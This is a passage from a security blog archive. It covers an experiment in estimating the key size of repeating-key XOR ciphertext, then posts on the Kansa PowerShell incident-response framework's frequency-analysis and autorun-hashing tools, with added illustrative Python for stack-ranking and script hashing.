<span style="font-family: Arial, Helvetica, sans-serif;">The value with the best NAvgHD was the correct key size 893 times or 34% of the time.<br />The value with the second best NAvgHD was the correct key size 714 times or 27% of the time.<br />The value with the third best NAvgHD was the correct key size 537 times or 20% of the time and the value with the fourth best NAvgHD was the correct key size 430 times or 16% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">All percentages have been rounded down, stop nitpicking my numbers.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As you can see, increasing the trial key sizes by one more multiple of the actual key size causes the HD algorithm to become less accurate, and unfortunately in real-world cases we have no knowledge of the actual key size.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">But how did my algorithm enhancements fare in this test run? Out of the 2574 test runs, my script selected the correct key size 2108 times or 81% of the time, not bad, but I believed I could do better. I also wanted to add more sample texts. So I did.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I downloaded a bunch of English language books from </span><a href="http://www.gutenberg.org/"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.gutenberg.org/</span></a><span style="font-family: Arial, Helvetica, sans-serif;"> and refactored my plaintext function to return random samples from these texts. I went through each of the files and removed the Project Gutenberg licensing information. I also removed some books that were framed in boxes made up of ASCII characters like pipes, dashes and underlines; I initially ran with these books in, but my numbers were skewed, so I investigated and took them out. I also removed duplicate texts, and I left in only a few of the books from the Bible as I thought they might have an undue influence on my results. In the end, I had 80 books total, comprised of 353422 non-blank lines, 3646553 words and 20415200 characters.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The average input to my XOR encryption was 196 words comprised of 1160 characters.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For expediency, I reduced the maximum encryption key size to 40 bytes on my initial run. The minimum key size was 2 bytes. The range of key sizes to be tried was set to 4 times the actual key size, and I opted to save the top six most probable key sizes for further review.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">I did make a significant change to the script. In the previous testing, I'd calculated the GCDs for the first three most probable key sizes. I modified the script to calculate the GCDs for every combination of the top n most probable key sizes. Since I was extracting the top six in this run, I was calculating the GCDs for those six key sizes in every possible pairwise combination. I also added a parameter for MaxNAvgHD -- the highest NAvgHD I would accept for the probable key size in cases where it could not be clearly determined; the default is 3.5.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">For evaluating the top six (in this case) most probable keys, I put the data through these steps:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<ol><span style="font-family: Arial, Helvetica, sans-serif;">
<li>Calculate the GCDs across every pair of values in the top n values and add them to a hashtable with a count of frequency of occurrence. Each time a given GCD appears, increment its counter in the hashtable.</li>
<li>Get the most frequently occurring GCD (MFGCD) from the hashtable.</li>
<li>If the MFGCD is in the list of the top n most probable key sizes and its NAvgHD is less than the MaxNAvgHD, then return MFGCD as the most Probable Key Size.</li>
</span></ol>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><span style="font-family: Arial, Helvetica, sans-serif;">If the conditions above are met, the likelihood that MFGCD is the correct key size is high. I haven't done the analysis to see what percentage of cases this is true for, but that analysis could be done. If those conditions are not met, do the following:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<ol><span style="font-family: Arial, Helvetica, sans-serif;">
<li>Take the smaller of the first two most probable key sizes as a possible key size.</li>
<li>Take the most probable key size with the smallest NAvgHD as a possible key size.</li>
<li>If the values from 1 and 2 are the same, return that value as the most probable key size.</li>
<li>If the values from 1 and 2 are not the same, if the first value has a NAvgHD below the MaxNAvgHD, return it as the most probable key size, else return value 2.</li>
</span></ol>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span><span style="font-family: Arial, Helvetica, sans-serif;">This last set of conditions gives more weight to the smaller of the top two values in the list of probable key sizes, but there's no guarantee that the smaller value is more likely to be the correct key size. However, the next step after attempting to calculate the correct key size is to break the encryption via brute force and it's going to be less expensive to try smaller keys than larger ones, so favoring the smaller key size when you're less certain as to the correctness of either key seems like the right thing to do.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Given these changes in my script, what was the outcome? In this test run there were 3897 samples encrypted with random keys from 2 to 40 bytes.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">The script returned the correct key size as the most probable key size 97% of the time.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The key size with the lowest NAvgHD was the correct key size 29% of the time.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Out of the 114 cases where the returned probable key size was not the actual key size, there were 79 cases where the top six most probable key sizes didn't even contain the correct key size. I found this to be the most troubling outcome of my testing, but diving into the data deeper, there was an explanation for 97% of these failures.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In 77 of these 79 cases, the key was equal to or longer than half the length of the plaintext, meaning the encryption key was not a repeating XOR key at all; some portion of the key may have repeated, but not the entire key. In fact, in 16 cases, the key was longer than the plaintext entirely, meaning the encryption key was effectively a one-time pad.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In the other two cases, I'm not sure what went wrong. In one, the key size was 14 bytes and the plaintext length was 35 bytes, the value with the lowest NAvgHD was seven and that was the most probable key size as returned by the script. It is a factor of 14, but that's little consolation. According to the output, 12, 11 and 17 all had lower NAvgHDs than 14. In the other failed case, the actual key size was 2 bytes and the plaintext was 2457 bytes in length. The script showed that a key size of three bytes had the lowest NAvgHD with 4, 7, 8, 6 and 5 rounding out the list. Clearly the most common GCD here would be two, but alas two was not in the list of most probable keys and so could not be returned as the most probable key size.</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">What of the other 35 cases where the correct key size was in the list of top six probable key sizes, but was not the most probable key size returned by the script? The results came out like this:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<table style="font-family: 'Courier New', Courier, monospace;"><tbody>
<tr><th>ActualKeySize</th><th>ProbableKeySize</th><th>Top6KeySizes</th></tr>
<tr><td>18</td><td>4</td><td>18:4:17:22:14:32</td></tr>
<tr><td>34</td><td>31</td><td>34:31:35:30:29:6</td></tr>
<tr><td>37</td><td>35</td><td>37:35:39:17:24:22</td></tr>
<tr><td>8</td><td>6</td><td>8:6:4:3:7:5</td></tr>
<tr><td>24</td><td>14</td><td>24:14:22:10:12:18</td></tr>
<tr><td>40</td><td>28</td><td>40:28:32:35:14:56</td></tr>
<tr><td>18</td><td>6</td><td>18:6:14:22:17:27</td></tr>
<tr><td>25</td><td>10</td><td>50:25:40:11:10:29</td></tr>
<tr><td>29</td><td>25</td><td>29:25:33:8:30:12</td></tr>
<tr><td>22</td><td>19</td><td>22:19:32:36:33:12</td></tr>
<tr><td>18</td><td>9</td><td>36:18:9:27:3:45</td></tr>
<tr><td>37</td><td>18</td><td>37:18:33:39:35:4</td></tr>
<tr><td>19</td><td>15</td><td>19:15:23:32:4:28</td></tr>
<tr><td>28</td><td>25</td><td>28:25:35:19:33:17</td></tr>
<tr><td>35</td><td>25</td><td>35:25:33:15:11:31</td></tr>
<tr><td>12</td><td>6</td><td>24:12:6:30:18:25</td></tr>
<tr><td>28</td><td>25</td><td>28:25:9:32:34:17</td></tr>
<tr><td>15</td><td>6</td><td>15:6:12:18:13:16</td></tr>
<tr><td>32</td><td>23</td><td>32:23:9:54:27:41</td></tr>
<tr><td>24</td><td>21</td><td>24:21:27:35:26:29</td></tr>
<tr><td>28</td><td>18</td><td>28:18:10:19:12:21</td></tr>
<tr><td>6</td><td>3</td><td>6:3:9:8:4:5</td></tr>
<tr><td>25</td><td>11</td><td>25:11:36:16:14:9</td></tr>
<tr><td>18</td><td>15</td><td>18:15:28:25:24:33</td></tr>
<tr><td>26</td><td>15</td><td>26:15:11:8:19:16</td></tr>
<tr><td>28</td><td>22</td><td>28:22:12:7:25:13</td></tr>
<tr><td>21</td><td>10</td><td>21:10:23:31:27:16</td></tr>
<tr><td>23</td><td>16</td><td>23:16:29:31:24:15</td></tr>
<tr><td>24</td><td>22</td><td>24:22:14:11:10:30</td></tr>
<tr><td>21</td><td>6</td><td>42:21:48:55:6:15</td></tr>
<tr><td>15</td><td>6</td><td>15:6:18:9:12:17</td></tr>
<tr><td>29</td><td>28</td><td>29:28:12:14:19:23</td></tr>
<tr><td>15</td><td>12</td><td>15:12:10:4:11:2</td></tr>
<tr><td>21</td><td>3</td><td>21:3:18:9:24:6</td></tr>
<tr><td>12</td><td>4</td><td>12:24:4:8:16:20</td></tr>
</tbody></table><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Again, if the script's most frequently occurring GCD calculation doesn't point out a clear winner, it puts more weight on smaller probable key sizes that have an NAvgHD value below a user-supplied threshold, with 3.5 being the default value. This could probably use refining, but again, the script has a much higher probability of returning the correct key size (around 97% in my testing) than NAvgHD alone (around 40% or less in my testing).</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">It would be easy to have the script return multiple ProbableKeySizes for cases where it can't clearly pick a winner and have that list sorted by key size in ascending order before entering the brute-force decryption phase of its work.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">As I said at the start of this post, I'm a crypto-noob and that's an insult to noobs everywhere. My methods may be fraught with errors and there are lots of smart people in the world who may skim this and laugh, but I wanted to share my analysis and the results because I found it interesting and even fun.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">My code for this is written in PowerShell and is available at </span><a href="https://github.com/davehull/MCC/blob/master/sets/1/XOR-Test.ps1"><span style="font-family: Arial, Helvetica, sans-serif;">https://github.com/davehull/MCC/blob/master/sets/1/XOR-Test.ps1</span></a><span style="font-family: Arial, Helvetica, sans-serif;">. For testing, I do something like:</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: "Courier New", Courier, monospace;">1..100 | Foreach-Object { .\XOR-Test.ps1 -MinKeySize 2 -MaxKeySize 60 -top 5 -MaxNAvgHD 3.4 | Export-Csv -NoTypeInformation .\output_$_.csv }</span><br />
<span style="font-family: Courier New;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The above will run the script 99 times. It will select some portion of text from text files in .\texts\ (sold separately). That text will be encrypted with a random two-byte key on the first pass; that ciphertext string will be passed to the code that attempts to calculate the key size, then the next iteration begins, selecting a new text value, picking a random three-byte key, and so on, saving the output to CSV files that you can analyze later using Excel or PowerShell.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;"><strong>Update</strong>: Running the same analysis again for 60 byte max key size, discarding the cases where the actual key size could not repeat because it was more than half the size of the plaintext, the script returned the correct key size as the most probable key size 99.5% of the time. By comparison, the key size with lowest NAvgHD was the correct key size 31% of the time.</span><br />
<span style="font-family: Arial;"></span><br />
<span style="font-family: Arial;">YMMV.</span><br />
<h3 style="text-align: left;">Kansa: Get-LogparserStack.ps1</h3>
Posted by davehull, 2015-03-30.<br />
<a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> is an incident response framework written in PowerShell, useful for data collection and analysis. Most of the <a href="https://github.com/davehull/Kansa/tree/master/Analysis" target="_blank">analysis</a> capabilities in Kansa require <a href="http://www.microsoft.com/en-us/download/details.aspx?id=24659" target="_blank">Logparser</a>, which is a very handy tool for creating SQL-like queries over data sets that may be comprised of a single file or many files.<br />
<br />
Because adversaries usually want to leave a small footprint, one technique for finding them is frequency analysis -- looking for outliers across many systems. This technique has been <a href="http://digital-forensics.sans.org/blog/2011/04/23/digital-forensics-least-freq-strings" target="_blank">written about before</a>. As such, most of the analysis tools in Kansa are scripts that stack-rank or perform frequency analysis of specific fields in a given data set. Some examples include:<br />
<ul>
<li>Get-ASEPImagePathMD5Stack.ps1</li>
<li>Get-ASEPImagePathLaunchStringMD5UnsignedStack.ps1</li>
<li>Get-ASEPImagePathLaunchStringMD5UnsignedTimeStack.ps1</li>
<li>...</li>
</ul>
And the list goes on. These script names are fairly descriptive, but they are a mouthful and they are not very flexible as they contain hardcoded Logparser queries with set field names.<br />
<br />
Kansa needed a more flexible stack-ranking solution and now it has one.<br />
<br />
Get-LogparserStack.ps1 can be used to perform frequency analysis against any delimited file or set of files, so long as every file in the set has the same schema and the same header row. Unlike all other Kansa utilities, Get-LogparserStack.ps1 is interactive. After reading the first two lines of each input file and confirming that they all have the same header row, the script prompts the user for the field she wishes to pass to Logparser's COUNT() function, then the script prompts the user for the fields she wishes to GROUP BY.<br />
<br />
Below is a screen shot of the script in action against a small set of Autorunsc data from five systems. The frequency analysis is against the "Image Path" field with both "Image Path" and MD5 being added to the GROUP BY clause. As you can see in the screen shot, the resulting query quickly bubbles up an outlier, a dll from one system does not match the same dll from the other four systems.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXplJ2xsrbGwbWXURi-twJBW2CXsbFu54daUYgj2zHp3Xa3Ke2XeMFvAN2C_2vywMC9xIn3dWy6Mjap5DIlO_81Y-lguRNH40tavmnCWLB6fa8HFAcpmom3U0GZnAR4q7Yl3Zzwdgh0E0/s1600/Get-LogparserStack.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXplJ2xsrbGwbWXURi-twJBW2CXsbFu54daUYgj2zHp3Xa3Ke2XeMFvAN2C_2vywMC9xIn3dWy6Mjap5DIlO_81Y-lguRNH40tavmnCWLB6fa8HFAcpmom3U0GZnAR4q7Yl3Zzwdgh0E0/s1600/Get-LogparserStack.png" height="238" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Get-Logparser.ps1 quickly shows that one dll is not like the others.</td></tr>
</tbody></table>
Get-LogparserStack.ps1 is a new utility and as such, may mature a bit in time. One potential feature would be to make it non-interactive, so it can be scripted.<br />
<br />
As with nearly all of the scripts that make up Kansa, Get-LogparserStack.ps1 can be used in conjunction with Logparser.exe outside the framework to perform frequency analysis of any data set, providing the schemas match and each file in the set has a header row.<br />
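As an added illustration (not Kansa's code and not a Logparser query), the Python below does the same header check and stack-rank that Get-LogparserStack.ps1 delegates to Logparser: confirm every file shares one header, COUNT one field grouped by the chosen fields, and sort ascending so the rarest combinations surface first. The five per-host CSV exports, their paths and their hash values are constructed for the example.

```python
import csv
import io
from collections import Counter


# Constructed Autorunsc-style exports from five hosts (two columns kept for brevity;
# the hash values are made up). The same DLL carries one MD5 on four hosts and a
# different MD5 on host5, which is the outlier a stack-rank should surface.
def _export(dll_md5: str) -> str:
    return ("Image Path,MD5\n"
            f"c:\\windows\\system32\\shared.dll,{dll_md5}\n"
            "c:\\tools\\agent.exe,22222222222222222222222222222222\n")


HOST_FILES = {f"host{i}": _export("11111111111111111111111111111111") for i in range(1, 5)}
HOST_FILES["host5"] = _export("99999999999999999999999999999999")


def read_header(text: str):
    """Header row of one delimited file (the first line, parsed as CSV)."""
    return next(csv.reader(io.StringIO(text)))


def common_header(files: dict):
    """Return the header shared by every file, or raise if any file differs:
    stacking across files only makes sense when they share one schema."""
    headers = {name: read_header(text) for name, text in files.items()}
    reference = next(iter(headers.values()))
    mismatched = [name for name, h in headers.items() if h != reference]
    if mismatched:
        raise ValueError("header mismatch in " + ", ".join(mismatched))
    return reference


def stack(files: dict, count_field: str, group_by: list):
    """Equivalent of SELECT COUNT(count_field), <group_by> ... GROUP BY <group_by>
    ORDER BY count ASC over every file; returns [(count, group_values), ...]."""
    header = common_header(files)
    for field in [count_field, *group_by]:
        if field not in header:
            raise KeyError(f"field {field!r} not in header {header}")
    counts = Counter()
    for text in files.values():
        for row in csv.DictReader(io.StringIO(text)):
            if row[count_field] == "":      # COUNT(field) skips empty values
                continue
            counts[tuple(row[g] for g in group_by)] += 1
    return sorted((n, key) for key, n in counts.items())


if __name__ == "__main__":
    # Same choice as the screenshot: count Image Path, group by Image Path and MD5.
    for n, key in stack(HOST_FILES, "Image Path", ["Image Path", "MD5"]):
        print(n, *key)
```

The row with a count of 1 is the host5 copy of shared.dll with its different hash; the header check raises before any counting when a file with a different schema slips into the set.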
<br />
If you use it and encounter any bugs, please open an issue in <a href="https://github.com/davehull/Kansa" target="_blank">Kansa's GitHub page</a>.<br />
<h3 style="text-align: left;">Kansa: Get-AutorunscDeep.ps1 -- Taking Autorunsc to 11</h3>
Posted by davehull, 2015-03-25.<br />
I wanted to put up a quick post about a new <a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a> collector I recently added -- <a href="https://github.com/davehull/Kansa/blob/master/Modules/ASEP/Get-AutorunscDeep.ps1" target="_blank">Get-AutorunscDeep.ps1</a>. <a href="https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx" target="_blank">Sysinternals' Autoruns</a> is a great utility for finding auto-start extension points in Windows and one <a href="http://www.bing.com/search?q=site%3Atrustedsignal.blogspot.com%20autoruns&qs=n&form=QBRE&pq=site%3Atrustedsignal.blogspot.com%20autoruns&sc=8-40&sp=-1&sk=&cvid=8957e921226d4747bcbf12467e859133" target="_blank">I've blogged about a number of times</a>.<br />
<br />
Kansa has had a collector that wraps around Autorunsc.exe from Sysinternals almost since I began writing Kansa in March of 2014. It's such a great little utility for enumerating so many persistence mechanisms in Windows, though it by no means covers all of them.<br />
<br />
Get-AutorunscDeep.ps1 goes to 11. How so? There are two ways that Get-AutorunscDeep.ps1 improves on Autorunsc.exe alone. <br />
<ol>
<li>Get-AutorunscDeep.ps1 includes code written by my friend <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> (who will be speaking at the <a href="http://www.sans.org/event/digital-forensics-summit-2015" target="_blank">SANS 2015 DFIR Summit</a>) that calculates the <a href="http://en.wikipedia.org/wiki/Entropy_(information_theory)" target="_blank">Shannon Entropy</a> of Autorunsc's Image Path property. As many of you well know, packed binaries are common in malware families and those binaries have higher entropy than many legit binaries, so knowing a file's entropy can be a useful lead generation tool when dealing with large amounts of data.</li>
<li>Get-AutorunscDeep.ps1 goes a step further than Autorunsc.exe alone for common interpreters that execute scripts, such as cmd.exe, PowerShell.exe or wscript.exe, which may call .bat, .ps1 or .vbs files respectively. Below in Figure 1, I've run the latest version of Autorunsc.exe and saved the output to a csv file, then loaded that csv file into a PowerShell variable called $data, then I'm dumping the contents of $data for any entry that calls a PowerShell script:</li>
</ol>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7AWKrMba84-Wv93yS8otN65H8AEJHWodrz_-5P8RgZFRfYEITiV7XEayiILiOPfeN7IkMHN6-SL6vLI9twNylMu69ttf96aTncS6-5PP7xHZ27-coTPDLQny9PsuuZZ9tsEJBdmmqYQ/s1600/AutorunscStraight.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp7AWKrMba84-Wv93yS8otN65H8AEJHWodrz_-5P8RgZFRfYEITiV7XEayiILiOPfeN7IkMHN6-SL6vLI9twNylMu69ttf96aTncS6-5PP7xHZ27-coTPDLQny9PsuuZZ9tsEJBdmmqYQ/s1600/AutorunscStraight.PNG" height="232" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1: Output of Autorunsc.exe for a PowerShell ASEP (Click to enlarge)</td></tr>
</tbody></table>
Note that in Figure 1, Autorunsc.exe provides hashes of the PowerShell.exe binary itself. I've worked investigations where adversaries have taken existing ASEP entries and modified the scripts that are called, planting their own malicious code in those scripts. If you've got an ASEP that runs via PowerShell, cmd.exe or wscript.exe on hundreds or thousands of hosts and you use Autorunsc.exe to collect that data, a few of the scripts called by that interpreter could have been modified by an attacker and you'd have no visibility into it via Autorunsc.exe alone.<br />
<br />
Get-AutorunscDeep.ps1 solves this problem, in most cases, by adding a hash of the script called by the interpreter. So for ASEPs like cmd.exe, PowerShell.exe and wscript.exe that call scripts, you'll see the hash of the binary itself as Autorunsc.exe calculates it, and you'll get the hash of the script because Get-AutorunscDeep.ps1 will calculate it for you, assuming it can find and read the script. Below in Figure 2 is an example of what this looks like; the data was collected from the same host as above, but remotely using Kansa:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtGi68WNkiklXINPlUILrybEtUi2wNwKTdzDTBTHDDgvtrd3EOpsOFLKZvJuEwVjaDxqQhRYriHSQ3Rd_XYENU3eWVHtLaRqvi7K8pzTG8fkMKzVSsYE5SgpvYhFvGdEdlsgcPzTfDP4Y/s1600/AutorunscDeep.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtGi68WNkiklXINPlUILrybEtUi2wNwKTdzDTBTHDDgvtrd3EOpsOFLKZvJuEwVjaDxqQhRYriHSQ3Rd_XYENU3eWVHtLaRqvi7K8pzTG8fkMKzVSsYE5SgpvYhFvGdEdlsgcPzTfDP4Y/s1600/AutorunscDeep.png" height="282" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Output of Get-AutorunscDeep.ps1 for the same PowerShell ASEP (Click to enlarge)</td></tr>
</tbody></table>
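To make the two additions concrete, here is an added Python sketch (not Get-AutorunscDeep.ps1 and not @z4ns4tsu's entropy code) that computes the Shannon entropy of an image's bytes, pulls the script path out of an interpreter's launch string, and hashes that script so a modified copy stands out next to an unchanged interpreter hash. The Autorunsc rows, file contents, and the output column names ScriptPath and ScriptMD5 are constructed assumptions; the real collector's columns may differ.

```python
import hashlib
import math
import re
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for one repeated value, 8.0 when all 256 byte
    values are equally frequent. Packed or encrypted payloads sit near the top."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def hash_bytes(data: bytes, algorithm: str = "md5") -> str:
    return hashlib.new(algorithm, data).hexdigest()


# Script extensions the interpreters named in the post (cmd.exe, PowerShell.exe,
# wscript.exe) commonly run. Quoted paths may contain spaces; unquoted ones may not.
SCRIPT_RE = re.compile(
    r'"([^"]+?\.(?:ps1|bat|cmd|vbs|js))"|(\S+?\.(?:ps1|bat|cmd|vbs|js))(?=\s|$)',
    re.IGNORECASE)


def script_path_from_launch_string(launch: str):
    """Return the script path named in an interpreter launch string, or None."""
    m = SCRIPT_RE.search(launch)
    return (m.group(1) or m.group(2)) if m else None


def deepen(row: dict, read_file) -> dict:
    """Return a copy of an Autorunsc row (assumed columns 'Image Path' and
    'Launch String') with ShannonEntropy of the image bytes and, when the launch
    string names a script, ScriptPath and ScriptMD5 added. read_file(path) returns
    the file's bytes or None when it cannot be found or read."""
    out = dict(row)
    image = read_file(row["Image Path"])
    out["ShannonEntropy"] = round(shannon_entropy(image), 3) if image is not None else None
    script = script_path_from_launch_string(row.get("Launch String", ""))
    content = read_file(script) if script else None
    out["ScriptPath"] = script
    out["ScriptMD5"] = hash_bytes(content) if content is not None else None
    return out


# Constructed data: a stand-in for the interpreter binary (uniformly distributed
# bytes, so its entropy is the maximum 8.0) and two versions of the same script,
# the second differing by one appended line, standing in for a tampered copy.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SCRIPT = r"C:\Scripts\Get-Inventory.ps1"
FILES_HOST_A = {PS_EXE: bytes(range(256)) * 4,
                SCRIPT: b"Get-Process | Export-Csv C:\\Scripts\\inventory.csv\n"}
FILES_HOST_B = {PS_EXE: FILES_HOST_A[PS_EXE],
                SCRIPT: FILES_HOST_A[SCRIPT] + b"# one extra line\n"}
ASEP_ROW = {"Entry Location": "Task Scheduler", "Image Path": PS_EXE,
            "Launch String": f'powershell.exe -ExecutionPolicy Bypass -File "{SCRIPT}"'}


if __name__ == "__main__":
    for name, files in (("host A", FILES_HOST_A), ("host B", FILES_HOST_B)):
        print(name, deepen(ASEP_ROW, files.get))
```

Across many hosts the interpreter's own hash and entropy are identical on both rows; only ScriptMD5 differs, which is exactly the field a stack-rank over the collected output would flag.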
Note the red marks in Figure 2 and apologies, I'm not a graphic artist. Get-AutorunscDeep.ps1 has added an MD5 hash for the Get-AutorunscDeep.ps1 script that the PowerShell executable in the above Scheduled Task is calling. You can also see the ShannonEntropy value for PowerShell.exe, another feature of Get-AutorunscDeep.ps1's output. Now consider the visibility this gives you if you have the same ASEP script deployed across thousands of hosts. Use Kansa's Get-AutorunscDeep.ps1 collector, in conjunction with Sysinternals' Autorunsc.exe, and you'll quickly be able to find versions of scripts that have been modified.
<h3 style="text-align: left;">Kansa: Passing arguments to collector modules</h3>
Posted by davehull, 2014-07-13.<br />
<div style="text-align: left;">
In my <a href="http://trustedsignal.blogspot.com/2014/07/kansa-automating-analysis.html" target="_blank">previous post</a> on Kansa's automated analysis, I mentioned there was another improvement I made to the framework that I would cover in a future post. I thought at that time, that Kansa was at a point where I could go into some details about the new feature, but as it turns out, it wasn't quite ready. </div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Previously, some of Kansa's collector modules would need to be edited or customized prior to being run. Disk\Get-File.ps1, for example, was one that could acquire a specific file from target machines, but users would have to edit the collector to specify the file they wanted to acquire. Obviously that was less than ideal, so I did some work that would allow users to specify those kinds of things via command line arguments. In my limited testing, this worked... but, my testing was limited.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This week I had a <a href="https://github.com/davehull/Kansa/pull/40" target="_blank">pull request</a> <span style="font-family: inherit;">submitted</span> by <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> for a collector module called Get-FilesByHash.ps1 that would allow investigators to take a cryptographic hash (MD5, SHA1, etc.) of a known suspect file, then search for files with that same hash across many machines in the environment. The module was the first that would take multiple arguments, the search path, the hash and the hash type; this is where Kansa had an issue. It couldn't pass multiple arguments to collectors, but after a couple nights of work, now it can.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I also added a few arguments to Get-FilesByHash.ps1, including a file extension regex so the script doesn't hash every single file looking for matches; instead, it only hashes files with extensions that match the provided regex. The default regex is \.(dll|exe|ps1|sys)$, which greatly reduces the number of files that will be hashed. I also added two more arguments that limit the files that will be hashed based on minimum and maximum file size in bytes.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here's a command line example showing how this module can be used:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">.\Kansa.ps1 -ModulePath ".\Modules\Disk\Get-FilesByHash.ps1 BF93A2F9901E9B3DFCA8A7982F4A9868,MD5,C:\Windows\System32,\.exe$" -target localhost -Verbose</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br /></div>
<span style="font-family: inherit;"></span><div style="text-align: left;">
<span style="font-family: inherit;">Above, Get-FilesByHash.ps1 will search for any files with the MD5 hash of BF93A2F9901E9B3DFCA8A7982F4A9868, in or below the C:\Windows\System32 path and ending with an extension of .exe. Notice that the arguments to Get-FilesByHash.ps1 are not named parameters. Named parameters are not supported for remoting, so they must be positional. Also note that they are comma-separated and that the module path and its arguments are quoted together.</span></div>
<span style="font-family: inherit;">
<div style="text-align: left;">
</div>
<div style="text-align: left;">
As with other modules, you can use the .\Modules\Modules.conf file to pass arguments to Get-FilesByHash.ps1 (or any other module that takes arguments) via the conf file itself. Here's the entry for the module above taken from the conf file:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">Disk\Get-FilesByHash.ps1 BF93A2F9901E9B3DFCA8A7982F4A9868,MD5,C:\Windows\System32</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Note the absence of quotes in the configuration file; I've also omitted the extension regex argument.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Adding the ability to pass parameters to modules meant I could remove several collectors from Kansa that were written to acquire specific event logs, each one collecting a specific log file. Instead, Kansa now has one collector written to generically collect any Windows event log, and the specific log is simply passed as an argument. Here's the relevant section of the .\Modules\Modules.conf file:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">Log\Get-LogWinEvent.ps1 Security<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Application-Experience/Program-Inventory<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Application-Experience/Program-Telemetry<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/EXE and DLL<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/MSI and Script<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/Packaged app-Deployment<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Shell-Core/Operational<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-TerminalServices-LocalSessionManager/Operational<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Above we have a single collector, Log\Get-LogWinEvent.ps1, that replaced nine collectors because it accepts an argument specifying which log to collect.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
